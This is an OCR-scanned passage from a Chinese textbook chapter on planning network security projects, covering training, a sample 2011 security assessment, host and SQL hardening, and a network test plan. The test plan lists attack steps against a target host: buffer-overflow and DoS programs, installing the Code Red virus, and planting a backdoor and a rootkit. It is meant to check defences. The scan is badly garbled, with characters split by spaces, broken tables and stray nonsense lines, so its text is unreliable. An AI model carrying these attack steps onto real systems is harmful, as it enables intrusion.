需要 的 物质 条 件 , 计 划 出 一 个 比较 合适 的 时 间 进 度 表 。 

2. 项 目 质量 保证 

项 目 质量 保证 包括 : 执行 人 员 的 质量 职责 、 项 目 质量 的 保证 措施 和 项 目 验收 。 

(1) 执行 人 员 的 质量 职责 : 规定 项 目 实施 相关 人 员 的 职责 ,如 项 目 经 理 、 技 术 负责 人 、 
技术 工程 师 、 后 勤 人 员 等 ,以 保证 整个 安全 项 目的 顺利 实施 。 

(2) 项 目 质量 的 保证 措施 : 严格 制定 出 保证 项 目 质量 的 措施 ,主要 的 内 容 涉及 参与 项 
目的 相关 人 员 、 项 目 中 涉及 的 安全 产品 和 技术 派出 支持 该 项 目的 相关 人 员 的 管理 。 

(3) 项 目 验 收 : 根据 项 目的 具体 情况 .与 用 户 确定 项 目的 详细 事项 ,包括 安全 产品 、 技 
术 完成 情况 .达到 的 安全 目的 等 ,最 后 进行 验收 。 


13.4.5 技术 支持 
技术 支持 包括 技术 支持 的 内 容 和 技术 支持 的 方式 。 
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1. 技术 支持 的 内 容 

包括 安全 项 目 中 所 包括 的 产品 和 技术 的 服务 ,提供 的 技术 和 服务 包括 以 下 内 容 。 
(1) 安全 调试 项 目 中 所 涉及 的 全 部 产品 和 技术 。 

(2) 安全 产品 及 技术 文档 。 

(3) 提供 安全 产品 和 技术 的 最 新 信息 。 

(4) 服务 器 的 免费 产品 升级 。 

2. 技术 支持 方式 

安全 项 目 完成 以 后 提供 的 技术 支持 服务 ,包括 以 下 内 容 。 
(1) 客户 现场 24 小 时 支持 服务 。 

(2) 客户 支持 中 心 热线 电话 。 

(3) 客户 支持 中 心 E-mail 服务 。 

(4) 客户 支持 中 心 Web 服务 。 


13.4.6 产品 报价 
项 目 所 涉及 的 全 部 产品 和 服务 的 报价 。 
13.4.7 产品 介绍 
项 目 涉及 的 所 有 产品 介绍 ,主要 是 使 用 户 清楚 所 选择 的 产品 是 什么 ,不 用 很 详细 ,但 要 
描述 清楚 。 
13.4.8 第 三 方 检测 报告 


由 一 个 第 三 方 的 中 立 机 构 , 对 实施 好 的 网 络 安全 架构 进行 安全 扫描 与 安全 检测 ,并 提供 
相关 的 检测 报告 。 


13.4.9 安全 技术 培训 


1. 管理 人 员 的 安全 培训 

主要 针对 公司 非 技术 的 管理 人 员 的 培训 ,提高 他 们 对 安全 的 重视 程度 。 主 要 针对 4 方 
面 内 容 进行 培训 。 

(1) 网 络 系统 安全 在 企业 系统 中 的 重要 性 。 

(2) 安全 技术 能 够 带 来 的 好 处 。 

(3) 安全 管理 能 够 带 来 的 好 处 。 

(4) 安全 集成 和 网 络 系统 集成 的 区 别 。 

2. 安全 技术 基础 培训 

主要 针对 网 络 系统 管理 员 ,安全 管理 相关 人 员 的 技术 培训 ,能 够 增强 他 们 的 安全 意识 ， 
了 解 主要 的 安全 技术 ,能 够 分 辨 出 网 络 、 系 统 和 应 用 中 可 能 存在 的 安全 问题 ,并 且 能 够 采用 
相关 的 安全 技术 、 产 品 或 服务 来 防范 。 培 训 的 内 容 包 括 7 个 方面 。 

(1) 系统 安全 、 网 络 安 全 和 应 用 安全 的 概述 。 

(2) 系统 安全 的 风险 威胁 和 漏洞 的 详细 分 析 。 
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(3) 网 络 安全 的 风险 ,威胁 和 漏洞 的 详细 分 析 。 

(4) 应 用 安全 的 风险 ,威胁 和 漏洞 的 详细 分 析 。 

(5) 安全 防范 措施 的 技术 和 管理 。 

(6) 安全 产品 功能 的 简单 分 类 。 

(7) 黑客 攻击 技术 .原理 和 步 又。 

3. 安全 攻防 技术 培训 

对 网 络 系统 管理 员 进 行 黑 客 攻击 的 手段 .原理 和 方法 的 培训 ,使 他 们 能 够 掌握 黑客 攻击 
的 技术 ,并 能 运用 到 实际 工作 中 ,有 能 力 来 保护 网 络 、 系 统 和 应 用 的 安全 。 培 训 的 内 容 应 该 
包括 7 个 方面 。 

(1) 黑客 技术 的 概念 。 

(2) 常用 的 攻击 技术 。 

(3) 攻击 手段 演示 。 

(4) 安全 攻击 实验 。 

(5) 常用 的 防范 技术 。 

(6) 防范 手段 演示 。 

(7) 安全 防范 实验 。 

4. Windows 9X/NT/2000/2003/2008 的 系统 安全 管理 培训 

主要 针对 网 络 管理 员 和 系统 安全 技术 培训 ,详细 介绍 操作 系统 的 安全 风险 ,安全 威胁 和 
安全 漏洞 等 ,使 网 络 或 系统 管理 员 能 够 独立 配置 安全 系统 ,独立 维护 操作 系统 的 安全 。 培 训 
内 容 包括 5 个 方面 。 

(1) 操作 系统 的 安全 基础 。 

(2) 操作 系统 的 安全 配置 与 应 用 。 

(3) 操作 系统 网 络 安全 的 配置 与 应 用 。 

(4) 操作 系统 的 安全 风险 和 威胁 。 

(5) 操作 系统 上 流行 的 安全 工具 的 使 用 。 

5. UNIX 系统 的 安全 管理 培训 

主要 针对 网 络 管理 员 和 系统 管理 员 的 系统 安全 技术 培训 ,详细 介绍 UNIX 的 安全 风 
险 .安全 威胁 、 安 全 漏洞 等 ,使 网 络 或 系统 管理 员 能 够 独立 配置 安全 系统 ,独立 维护 UNIX 
系统 的 安全 。 培 训 主 要 包括 5 个 方面 。 

(1) UNIX 的 安全 基础 。 

(2) UNIX 系统 的 安全 配置 与 应 用 。 

(3) UNIX 网 络 安全 的 配置 与 应 用 。 

(4) UNIX 网 络 系统 的 安全 风险 和 威胁 。 

(5) UNIX 平台 上 流行 的 安全 工具 的 使 用 。 

6. 安全 产品 的 培训 

主要 针对 安全 项 目 中 所 用 到 的 安全 产品 向 有 关 人 员 提 供 培训 ,培训 的 内 容 主要 包括 4 
个 方面 ,可 以 根据 实际 情况 进行 删 减 。 

(1) 安全 产品 的 功能 分 类 ,如 防火 墙 、. 防 病毒 .人 侵 检 测 。 
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(2) 安全 产品 的 基本 概念 和 原理 ,如 防火 墙 技术 、 防 病毒 技术 .入侵 检测 技术 等 。 
(3) 各 种 安全 产品 在 安全 项 目 中 的 作用 、 重 要 性 和 局 限 性 。 
(4) 安全 产品 的 使 用 维护 和 安全 。 


13.5 网 络 安全 评估 


由 于 计算 机 网 络 是 一 个 庞大 的 系统 ,涉及 硬件 、 软 件 ,有 系统 的 内 在 因素 ,也 有 外 在 影 
响 , 受 到 许多 方面 的 制约 。 同 时 ,因为 人 们 所 处 的 角度 不 同 ,对 安全 问题 所 得 出 的 结论 也 不 
同 。 在 信息 安全 的 标准 化 中 ,众多 标准 化 组 织 在 安全 需求 服务 分 析 指导 、 安 全 技术 机 制 开 
发 .安全 评估 标准 等 方面 制定 了 许多 标准 及 草案 。 因 此 ,必须 有 一 套 比较 规范 .统一 和 通用 
的 安全 评估 标准 。 


13.5.1 网 络 安全 评估 的 目的 及 意义 


计算 机 网 络 的 安全 问题 已 成 为 影响 网 络 应 用 健康 发 展 的 重要 因素 。 由 于 安全 问题 针对 
系统 的 应 用 环境 、 应 用 领域 以 及 处 理 信息 密级 的 不 同 ,要 求 有 很 大 差别 ,所 以 ,安全 问题 是 计 
算 机 网 络 系统 能 否 正 常 使 用 的 关键 问题 之 一 。 计 算 机 网 络 的 安全 要 求 是 依据 其 处 理 信息 的 
密级 种 类 、 系 统 用 途 以 及 应 用 环境 不 同 而 提出 来 的 。 例 如 ,处 理 秘密 信息 的 系统 与 处 理 绝密 
信息 的 系统 要 求 不 同 ; 处 理 相 同 密级 的 敏感 信息 的 军事 要 求 与 商业 要 求 不 同 ; 在 战 时 环境 
与 平时 环境 处 理 信息 的 安全 要 求 也 不 同 ,这 就 要 求 对 系统 的 可 靠 性 ,安全 性 和 保密 性 有 定量 
或 定性 的 评估 标准 。 

计算 机 网 络 安全 的 评估 标准 可 作为 系统 安全 评价 的 依据 ,也 是 各 产品 和 服务 提供 商 衡 
量 其 产品 和 服务 是 否 符合 系统 安全 需求 的 依据 ,避免 同一 系统 同一 应 用 的 多 种 评价 结果 。 
安全 评估 标准 的 重要 意义 主要 有 以 下 几 点 。 

1. 指导 用 户 建立 符合 安全 需求 的 网 络 

用 户 为 了 系统 的 安全 ,首先 根据 自己 应 用 的 安全 级 别 ,选用 评定 了 安全 等 级 的 计算 机 网 
络 系统 产品 (如 适用 的 操作 系统 ,适宜 的 数据 库 产 品 , 适 合 的 网 络 结构 等 ) ,并 在 此 基础 上 采 
取 合 适 的 安全 措施 。 

2. 建立 系统 内 其 他 部 件 的 安全 评估 标准 

系统 的 安全 是 多 方面 的 ,有 了 符合 安全 构架 的 网 络 后 .还 应 建立 系统 内 其 他 部 件 的 安全 
评估 标准 ,如 WWW 、E-mail、.FTP、Telnet 等 应 用 的 安全 标准 。 配 合 操作 系统 和 平台 的 安全 
性 ,实现 尽 可 能 完善 的 性 能 。 

采用 统一 的 安全 评估 标准 ,无 论 对 生产 厂家 还 是 用 户 都 大 有 益处 。 一 方面 ,生产 厂家 根 
据 统 一 的 评估 标准 ,生产 出 符合 不 同安 全 需要 的 计算 机 网 络 产品 ; 另 一 方面 ,用 户 根据 自己 
的 应 用 环境 和 不 同 的 用 途 , 选 择 其 符合 需要 的 计算 机 网 络 产 品 。 正 是 基于 上 述 目 的 ,各 国都 
非常 重视 在 这 方面 的 研究 ,美国 和 欧盟 等 先后 制订 了 相应 的 计算 机 系统 和 网 络 系 统 的 安全 
评估 标准 。 
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13.5.2 网 络 安全 评估 服务 


网 络 安全 评估 服务 主要 包括 如 下 内 容 。 

(1) 审核 企业 安全 架构 中 相关 的 人 员 及 过 程 ,包括 策略 、 组 织 、 人 员 资产 、 风 险 评估 及 
最 小 化 、 物 理 安全 ,访问 控制 .网 络 和 计算 机 的 管理 .事物 的 连续 性 、 系 统 发 展 的 规划 、 最 佳 实 
践 及 调整 的 顺序 。 

(2) 审核 整个 企业 内 部 网 络 中 每 台 联 网 主机 的 开放 端口 及 存在 的 相应 的 安全 隐患 。 

(3) 审核 整个 企业 内 部 网 络 中 每 台 联 网 主机 使 用 的 网 络 协议 及 应 用 ,确保 应 用 与 安全 
的 统一 ,保证 安全 的 最 大 化 。 

(4) 审核 整个 企业 内 部 网 络 的 设计 ,确定 以 业务 功能 为 基础 的 资产 分 段 和 访问 上 的 有 
效 性 。 

(5) 详细 正式 的 评估 报告 ,包括 详细 的 长 期 及 短期 改进 的 建议 。 

网 络 安全 评估 是 一 个 比较 泛 化 的 概念 ,其 核心 是 网 络 安全 风险 评估 。 随 着 业界 对 于 信 
息 安 全 问题 认识 的 不 断 深入 和 信息 安全 体系 的 不 断 实 践 , 越 来 越 多 的 人 发 现 信息 安全 问题 
最 终 都 归结 为 一 个 风险 管理 问题 。 据 统计 ,国外 发 达 国 家 用 在 信息 安全 评估 上 的 投资 占 企 
业 总 投资 的 1%~~5% ,电信 和 金融 行业 能 达到 3% 一 5%。 照 此 计算 ,每 年 仅 银行 的 安全 评 
估 费 用 就 超过 几 个 亿 。 而 且 , 企 业 的 安全 风险 信息 是 动态 变化 的 ,只 有 动态 的 信息 安全 评估 
才能 发 现 和 跟踪 最 新 的 安全 风险 。 所 以 企业 的 网 络 信息 安全 评估 是 一 个 长 期 持续 的 工作 ， 
通常 应 该 每 隔 1 一 3 年 就 进行 一 次 安全 风险 评估 。 


13.5.3 网 络 安全 评估 方案 实例 


对 网 络 系统 的 安全 评估 ,一 般 分 为 以 下 5 个 步骤 进行 。 

第 一 步 , 进 行 实体 的 安全 性 评估 。 

第 二 步 , 对 网 络 与 通信 的 安全 性 进行 评估 。 

第 三 步 ,对 实际 应 用 系统 的 安全 性 进行 评估 。 

第 四 步 ,由 评估 小 组 的 工程 师 亲 自 对 评估 的 结果 进行 分 析 汇 总 ,并 对 部 分 项 目 进行 手动 
检测 ,消除 漏 报 情况 。 

第 五 步 , 根 据 评估 的 结果 ,得 出 此 次 评估 的 评估 报告 。 

1. 管理 制度 

健全 的 管理 制度 是 做 好 网 络 安全 的 有 力 保障 ,包括 机 房管 理 制度 、 文 档 设备 管理 制度 、 
管理 人 员 培 训 制 度 、 系 统 使 用 管理 制度 等 。 

1) 评估 说 明 

首先 做 好 评估 时 间 、 评 估 地 点 、 评 估 方 式 的 详细 说 明 。 不 同 的 评估 时 间 , 即 使 评估 地 点 、 
评估 方式 相同 也 会 有 不 同 的 测试 结果 ; 同样 ,不 同 的 评估 方式 ,相同 的 时 间 、 地 点 ,结果 也 大 
不 相同 。 所 以 在 评估 之 前 一 定 要 对 这 些 方 面 进行 详细 的 说 明 。 

2) 评估 内 容 

评估 内 容 包含 以 下 几 个 方面 : 机 房管 理 制 度 、 文 档 设备 管理 制度 、 管 理 人 员 培 训 制 度 、 
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系统 使 用 管理 制度 等 ,可 以 通过 表 13-1 进行 记录 。 
表 13-1 管理 制度 安全 评估 表 
安全 风险 


编号 项 目 详细 说 明 
高 中 低 


中 心机 房 
文档 管理 
系统 维护 
设备 使 用 
管理 人 员 培 训 
客 户 
意 见 


上 eol 


3) 评估 分 析 报 告 

对 公司 的 信息 网 络 系统 的 各 项 管理 制度 进行 细致 的 评估 ,并 对 各 项 评估 的 结果 进行 详 
细 的 分 析 , 找 出 原因 ,说 明 存 在 哪些 漏洞 ,比如 由 于 公司 网 络 信息 系统 刚刚 建立 ,各 项 管理 规 
章 制 度 均 没 有 健全 ,为 今后 的 管理 留 下 了 隐患 ,网 络 系统 的 管理 上 存在 许多 漏洞 。 

4) 建议 

提出 初步 的 意见 ,如 健全 各 种 管理 规章 制度 。 当 然 具 体 的 意见 要 在 完善 时 提出 。 

2. 物理 安全 

物理 安全 是 信息 系统 安全 的 基础 ,我 们 将 依据 实体 安全 国家 标准 ,将 实施 过 程 确定 为 以 
下 检测 与 优化 项 目 。 

1) 评估 说 明 

评估 时 间 : 2011 年 07 月 29 日 上 午 

评估 地 点 : 中 心机 房 

评估 方式 : 人 工分 析 

2) 评估 内 容 

物理 安全 一 般 包 括 场地 安全 机房 环 境 、 建 筑 物 安全 .设备 可 靠 性 .辐射 控 制 、. 通 信 线 路 
安全 性 动力 安全 性 灾难 预防 与 恢复 措施 等 几 方 面 。 可 参考 表 13-2 进行 。 

3) 评估 分 析 报 告 

通过 对 公司 各 结 点 的 实地 考察 测量 ,看 是 否 存在 以 下 不 安全 因素 。 

。 场地 安全 措施 是 否 得 当 。 

。 建筑 物 安全 措施 是 否 完善 。 

。 机 房 环 境 好 坏 。 
网 络 设备 的 可 靠 性 。 
。 是否 考虑 了 辐射 控制 安全 性 。 
。 通信 线路 的 安全 性 。 
。 动力 可 靠 性 。 
。 灾难 预防 与 恢复 的 能 力 。 
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表 13-2 物理 安全 评估 


安全 风险 
编号 项 目 详细 说 明 
高 中 低 


1 | 场地 安全 | 位 置 /楼 导 


2 | 机 房 环 境 


ES 
学 
沪 
址 


7 动力 论调 
8 灾难 预防 与 恢复 


客户 
意见 


4) 建议 

计算 机 机 房 的 设计 或 改建 应 符合 GB2887、GB9361 和 GJB322 等 现行 的 国家 标准 。 除 
参照 上 述 有 关 标 准 外 ,还 应 注意 满足 下 述 各 项 要 求 。 

。 机 房 主体 结构 应 具有 与 其 功能 相 适 应 的 耐久 性 抗震 性 和 耐火 等 级 。 变 形 颖 和 伸缩 

缝 不 应 穿 过 主机 房 。 

机 房 应 设置 相应 的 火灾 报警 和 灭火 系统 。 

机 房 应 配置 琉 散 照明 设备 并 设置 安全 出 口 标志 。 

。 机 房 应 采用 专用 的 空调 设备 , 若 与 其 他 系统 共用 时 ,应 确保 空调 效果 ,采取 防火 隔离 
措施 。 长 期 连续 运行 的 计算 机 系统 应 有 备用 空调 。 空 调 的 制冷 能 力 , 要 留 有 一 定 的 
余 量 ( 宜 取 15%% 一 20%%) 。 

。 计算 机 的 专用 空调 设备 应 与 计算 机 联 控 , 保 证 做 到 开机 前 先 送 风 ,停机 后 再 停 风 。 

。 机 房 应 根据 供电 网 的 质量 及 计算 机 设备 的 要 求 , 采 用 电源 质量 改善 措施 和 隔离 防护 

措施 ,如 滤波 、 稳 压 、 稳 频 及 不 间断 电源 系统 等 。 

计算 机 系统 中 使 用 的 设备 应 符合 GB4943 中 规定 的 要 求 , 并 是 经 过 安全 检查 的 合格 

产品 。 

3. 计算 机 系统 的 安全 性 

计算 机 系统 的 安全 性 又 称 平台 安全 性 。 平台 安全 泛 指 操作 系统 和 通用 基础 服务 安全 ， 
主要 用 于 防范 黑客 攻击 。 目 前 市 场 上 大 多 数 安全 产品 均 限 于 解决 平台 安全 ,我 们 以 通用 信 
息 安全 评估 准则 为 依据 ,确定 平台 安全 的 内 容 , 其 实施 过 程 主要 包括 以 下 内 容 。 
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1) 评估 说 明 

评估 时 间 : 2011 年 07 月 30 日 

评估 地 点 : 中 心机 房 

评估 方式 : 软件 检测 (X-Scan 等 ) 和 人 工分 析 

2) 评估 内 容 

在 这 里 分 别 对 Proxy Server/ Web Server/Printer Server 等 各 服务 器 ,进行 扫描 检测 ， 
并 详细 记录 。 可 参考 表 13-3。 

表 13-3 计算 机 系统 安全 评估 


安全 风险 
编号 项 有 目 详细 说 明 
高 中 低 


UNIX 系统 

二 操作 系统 漏洞 检测 | Windows 系统 

网 络 协议 
介质 与 载体 安全 保护 
数据 访问 控制 
数据 完整 性 
数据 可 用 性 

数据 监控 和 审计 
数据 存储 与 备份 安全 
客 户 

意 见 


2 数据 安全 


3) 评估 分 析 报 告 
计算 机 系统 的 安全 评估 主要 在 于 分 析 计 算 机 系统 存在 的 安全 弱点 和 确定 可 能 存在 的 威 
胁 和 风险 ,并 且 针 对 这 些 弱点 .威胁 和 风险 提出 解决 方案 。 
计算 机 系统 存在 的 安全 弱点 和 信息 资产 紧密 相连 , 它 可 能 被 威胁 利用 、 引 起 资产 损失 或 
伤害 。 但 是 ,安全 弱点 本 身 不 会 造成 损失 , 它 只 是 一 种 条 件 或 环境 ,但 可 能 导致 被 威胁 利用 
而 造成 资产 损失 。 安 全 弱点 的 出 现 有 各 种 原因 ,例如 可 能 是 软件 开发 过 程 中 的 质量 问题 ,也 
可 能 是 系统 管理 员 配置 方面 的 缺陷 ,也 可 能 是 管理 方面 的 漏洞 等 。 但 是 ,它们 的 共同 特性 就 
是 给 攻击 者 提供 了 对 主机 系统 或 者 其 他 信息 系统 攻击 的 机 会 。 
经 过 对 这 些 计 算 机 系统 和 防火 墙 的 扫描 记录 分 析 , 我 们 发 现 目前 该 公司 网 络 中 的 计算 
机 系统 主要 弱点 集中 在 以 下 几 个 方面 。 
。 系统 自身 存在 弱点 。 对 于 Windows Server 2008 系统 的 补丁 更 新 不 及 时 ,没有 进行 
安全 配置 ,系统 运行 在 默认 的 安装 状态 ,非常 危险 。 有 的 服务 器 系统 ,虽然 补丁 更 新 
得 比较 及 时 ,但 是 配置 上 存在 很 大 安全 隐患 ,用 户 密码 口令 的 强度 非常 低 , 很 多 还 在 
使 用 默认 的 弱 口 令 ,网 络 攻 击 者 可 以 非常 轻易 地 接管 整个 服务 器 。 另 外 存在 ipc$ 
这 样 的 匿名 共享 ,可 能 会 泄漏 很 多 服务 器 的 敏感 信息 。 
。 系统 管理 存在 弱点 。 在 系统 管理 上 缺乏 统一 的 管理 策略 ,比如 缺乏 对 用 户 轮廓 文件 
(profile) 的 支持 。 
。 数据 库 系 统 的 弱点 。 数 据 库 系 统 的 用 户 权限 设置 不 当 和 允许 执行 外 部 系统 指令 是 
该 系统 最 大 的 安全 弱点 ,由 于 未 对 数据 库 采 取 明 显 的 安全 措施 ,因此 应 进一步 对 数 
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据 库 安装 最 新 的 升级 补丁 。 
。 来 自 周边 机 器 的 威胁 。 手 工 测试 发 现 部 分 周边 机 器 明显 存在 严重 安全 漏洞 ,来 自 周 
边 机 器 的 安全 弱点 (比如 可 能 是 用 同样 的 密码 等 ) 将 是 影响 网 络 的 最 大 威胁 。 
主机 存在 的 威胁 和 风险 。 安 全 威胁 是 一 种 对 系统 、 组 织 及 其 资产 构成 潜在 破坏 能 力 的 
可 能 性 因素 或 者 事件 。 产 生 安 全 威胁 的 主要 因素 可 以 分 为 人 为 因素 和 环境 因素 。 人 为 因素 
包括 有 意 的 和 无 意 的 因素 。 环 境 因素 包括 自然 界 的 不 可 抗力 因素 和 其 他 物理 因素 。 
安全 风险 是 指 某 个 威胁 利用 弱点 引起 某 项 信息 资产 或 一 组 信息 资产 的 损害 ,从 而 直接 
地 或 间接 地 引起 企业 或 机 构 信息 系统 损害 的 可 能 性 。 
数据 的 安全 性 包括 SCSI 热 插 拔 硬盘 没有 安全 锁 , 人 员 杂 乱 ,硬盘 很 容易 取 走 ; 数据 存 
储 缺 乏 宛 余 备份 机 制 ; 数据 的 访问 采用 了 工作 组 方式 ,未 考虑 是 否 需要 验证 ; 没有 备份 措 
施 ,硬盘 损坏 不 能 恢复 等 。 
4) 建议 
。 主机 安全 系统 增强 配置 如 表 13-4 所 示 。 
表 13-4 主机 安全 系统 增强 配置 
Windows Server 2008 安全 增强 配置 


基本 配置 管理 对 Windows Server 2008 中 那些 易 造 成 安全 隐患 的 默认 配置 重新 设置 ,诸如 : 系 
统 引 导 时 间 设 置 为 0s、 从 登录 对 话 框 中 删除 关机 按钮 等 

文件 系统 配置 对 涉及 文件 系统 的 安全 漏洞 进行 修补 或 是 修改 配置 ,诸如 : 采用 NTFS 格式 等 

对 涉及 用 户 账号 的 安全 隐患 通过 配置 或 修补 消除 ,诸如 : 设置 口令 长 度 ,检查 用 


全 和 让 户 账号 组 成 员 关系 和 特权 等 
i 通过 对 易 造 成 安全 隐患 的 系统 网 络 配 园 进 行 安全 基本 配置 ,诸如 ,锁定 管理 员 
的 网 络 连接 ,检查 网 络 共享 情况 或 去 除 TCP/IP 中 的 NetBIOS 绑 定 等 
利用 某 些 安全 工具 增强 系统 的 安全 性 ,诸如 ; 运行 syskey 工具 为 数据 库 提供 其 
SN 他 额外 的 安全 措施 等 
pe 和 有 有 者 才 多 件 汪 主 本 富有 人手 交 天 并 了 入 


其 他 服务 安全 配置 | 针对 系统 需要 提供 的 其 他 服务 ,进行 安全 配置 ,诸如 : DNS, Mail 等 


。 MS-SQL 服务 器 安全 管理 和 配置 建议 。 

更 改 用 户 弱 口令 ; 安装 最 新 的 SQL 服务 器 补丁 SP3; 尽 可 能 删除 所 有 数据 库 中 的 
Guest 账号 ; 在 服务 器 的 特性 中 , 设 定 比较 高 的 审计 等 级 ; 限制 只 有 sysadmin 的 等 级 用 户 
才 可 以 进行 CmdExec 任务 ; 选择 更 强 的 认证 方式 ; 设 定 合 适 的 数据 库 备 份 策略 ; 设 定 确切 
的 扩展 存储 进程 权限 ; 设 定 statement 权限 ; 设 定 合 适 的 组 .用户 权限 ; 设 定 允 许 进行 连接 
的 主机 范围 ; 限制 对 sa 用 户 的 访问 ,分 散 用 户 权 限 。 支 持 多 种 验证 方式 。 

。 媒体 管理 与 安全 要 求 。 

媒体 分 类 ,根据 媒体 上 的 记录 内 容 将 媒体 分 为 A、B、C 三 种 基本 类 别 。A 类 媒体 : 媒体 上 
的 记录 内 容 对 系统 .设备 功 能 来 说 是 最 重要 的 ,不 能 替代 的 ,毁坏 后 不 能 立即 恢复 的 。B 类 媒 
体 : 媒体 上 的 记录 内 容 在 不 影响 系统 主要 功能 的 前 提 下 可 进行 复制 ,但 这 些 数据 记录 复制 过 
程 较 困难 或 价格 较 昂贵 。C 类 媒体 : 媒体 上 的 记录 内 容 在 系统 调试 及 应 用 过 程 中 容易 得 到 。 

媒体 的 保护 要 求 保留 在 机 房 内 的 媒体 数量 应 是 系统 有 效 运 行 所 需 的 最 小 数量 。A、B 类 
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媒体 应 放 入 防火 、 防 水 防震、 防潮 、 防 腐蚀 、 防 静电 及 防 电磁 场 的 保护 设备 中 , 且 必 须 进行 备 
份 , 像 主 服务 器 必须 有 备份 域 服务 器 。C 类 媒体 应 放 在 密闭 金属 文件 箱 或 柜 中 。A、B 类 媒体 
应 采取 防 复制 及 信息 加 密 措 施 。 媒 体 的 传递 与 外 借 应 有 审批 手续 传递 记录 。 重 要 数据 的 处 
理 过 程 中 ,被 批准 使 用 数据 人 员 以 外 的 其 他 人 员 不 应 进入 机 房 工 作 。 处 理 结束 后 ,应 清除 不 能 
带 走 的 本 作业 数据 。 应 妥善 处 理 打印 结果 ,任何 记 有 重要 信息 的 废弃 物 在 处 理 前 应 进行 粉碎 。 

对 于 媒体 还 应 进行 严格 的 管理 。 媒 体 应 造 册 登记 ,编制 目录 ,集中 分 类 管理 。 根 据 需要 
与 存储 环境 ,记录 要 定期 进行 循环 复制 (每 周 /每 月 /半年 ) 备 份 。 新 的 网 络 设备 或 系统 应 有 
完整 的 归档 记录 。 各 种 记录 应 定期 复制 到 媒体 上 , 送 媒 体 库 进行 保管 。 未 用 过 的 媒体 应 定 
期 检查 ,情况 应 例 行 登记 。 报 废 的 媒体 在 进行 销毁 之 前 ,应 进行 消 磁 或 清除 数据 ,并 应 确保 
销毁 的 执行 。 媒 体 未 经 审批 ,不 得 随意 外 借 。 建 立 媒 体 库 。 媒 体 库 的 选 址 应 选 在 水 、 火 等 灾 
害 影 响 不 到 的 地 方 。 媒 体 库 应 设立 库 管 理 员 ,负责 管理 工作 ,并 核查 媒体 使 用 人 员 的 身份 与 
权限 。 媒 体 库 内 所 有 媒体 ,应 统一 编目 ,集中 分 类 管理 。 

4. 网 络 与 通信 安全 

网 络 与 通信 的 安全 性 在 很 大 程度 上 决定 着 整个 网 络 系统 的 安全 性 ,因此 网 络 与 通信 安 
全 的 评估 是 整个 网 络 系统 安全 性 评估 的 关键 。 可 以 从 以 下 几 个 方面 对 网 络 与 通信 安全 性 进 
行 详 细 的 测试 。 

1) 评估 说 明 

评估 时 间 : 2011 年 07 月 30 日 下 午 

评估 地 点 : 中 心机 房 及 下 设 结 点 

评估 方式 : 软件 测试 和 人 工分 析 

2) 评估 内 容 

参考 表 13-5 的 内 容 进行 评估 。 

表 13-5 网络 与 通信 安全 评估 


安全 风险 
编号 项 目 详细 说 明 
高 中 低 
路 由 器 
1 网 络 基础 设施 交换 机 
防火 墙 
干线 布线 
2 通信 线路 水 平 布 线 
设备 间 布 线 
3 | 通用 基础 应 用 程序 
4 | 网 络 安全 产品 部 署 
5 | 整体 网 络 系统 平台 安全 综合 测试 模拟 入侵 
6 | 网 络 加 密 设施 安装 及 通信 加 密 软件 的 设置 
7 | 设置 身份 鉴别 机 制 
8 | 设置 并 测试 安全 通道 


客 
意 


[= 
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此 外 ,还 应 按照 下 列 项 目 进行 安全 测试 。 

。 扫描 测试 。 从 PC 上 用 任意 扫描 工具 (例如 SuperScan) 对 目标 主机 进行 扫描 ,目标 
主机 应 根据 用 户 定义 的 参数 采取 相应 动作 。 

。 攻击 测试 。Buffer Overflow 攻击 : 从 PC 上 用 Buffer Overflow 攻击 程序 (例如 
snmpxdmid) 对 目标 主机 进行 攻击 ,目标 主机 应 采取 相应 动作 一 一 永久 切断 该 PC 到 
它 的 网 络 连接 。DoS 攻击 : 从 PC 上 用 DoS 攻击 程序 对 目标 主机 进行 攻击 ,目标 主 
机 应 采取 相应 动作 一 一 临时 切断 该 PC 到 它 的 网 络 连接 。 病 毒 处 理 : 在 Windows 
PC 上 安装 Code Red 病毒 程序 ,对 目标 主机 进行 攻击 ,目标 主机 应 采取 相应 动作 自 
动 为 该 PC 清除 病毒 。 

。 后门 检测 。 在 目标 主机 上 安装 后 门 程序 (例如 backhole), 当 攻击 者 从 PC 上 利用 该 

后 门 进 入 主机 时 ,目标 主机 应 能 自动 报警 ,并 切断 该 PC 到 它 的 网 络 连 接 。 

rootkit 检测 。 在 目标 主机 上 安装 后 门 程序 ,并 自动 隐藏 ,目标 主机 应 能 自动 报警 ,并 

启动 文件 检查 程序 ,发 现 被 攻击 者 蔡 换 的 系统 软件 。 

。 漏洞 检测 。 在 目标 主机 检测 到 rootkit 后 ,漏洞 检测 自动 启动 ,应 能 发 现 攻击 者 留 下 
的 后 门 程序 ,并 将 其 端口 堵塞 。 用 户 应 能 随时 启动 漏洞 检测 ,发 现 系 统 的 当前 漏洞 ， 
并 将 其 端口 堵塞 。 

。 陷阱 。 系 统 提供 一 些 WWW、CGI 陷阱 , 当 攻 击 者 进入 陷阱 时 ,系统 应 能 报警 。 

。 密集 攻击 测试 。 使 用 密集 攻击 工具 对 目标 主机 进行 每 分 钟 上 百 次 不 同类 型 的 攻击 ， 
系统 应 能 继续 正常 工作 。 将 上 述 几 个 方面 的 测试 填写 测试 表 , 如 表 13-6 所 示 。 

表 13-6 各 种 攻击 测试 安全 评估 


测试 结果 
通过 部 分 通过 未 通过 


测试 项 目 


扫描 测试 

Buffer Overflow 攻击 
攻击 测试 DoS 攻击 

病毒 处 理 


后 门 检测 
rootkit 检测 
漏洞 检测 
陷阱 

密集 攻击 测试 


3) 评估 分 析 报 告 

通过 以 上 不 同类 型 的 测试 ,可 以 得 出 以 下 结论 : 

路 由 器 配置 的 不 安全 因素 。 在 路 由 器 中 是 否 存在 一 些 不 必要 的 服务 ; 还 有 secret 口令 
没有 加 密 等 。 防 火 墙 是 否 能 够 起 作用 。 网 络 系统 能 否 通过 扫描 测试 ,以 及 Buffer Overflow 
攻击 测试 .DoS 攻击 测试 .密集 型 攻击 测试 ,还 有 漏洞 检测 等 。 网 络 的 通信 和 是否 建立 了 加 密 
机 制 ,信息 是 否 明文 发 送 ,服务 器 采用 何 种 工作 方式 ,是否 需 验 证 ,等 等 。 

4) 建议 

。 防火 墙 安全 增强 设置 如 表 13-7 所 示 。 
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表 13-7 防火墙 安全 增强 配置 


防火 墙 安全 增强 配置 
服务 名 称 服务 内 容 
- 了 解 防火 墙 类 型 ,检查 防火 墙 包 过 渡 功 能 .支持 代理 功能 、 全 状态 检测 功能 
防火 墙 访问 控制 配置 | 以 及 URL 过 滤 功能 ,并 根据 防火 墙 基本 配置 方案 进行 访问 控制 配置 
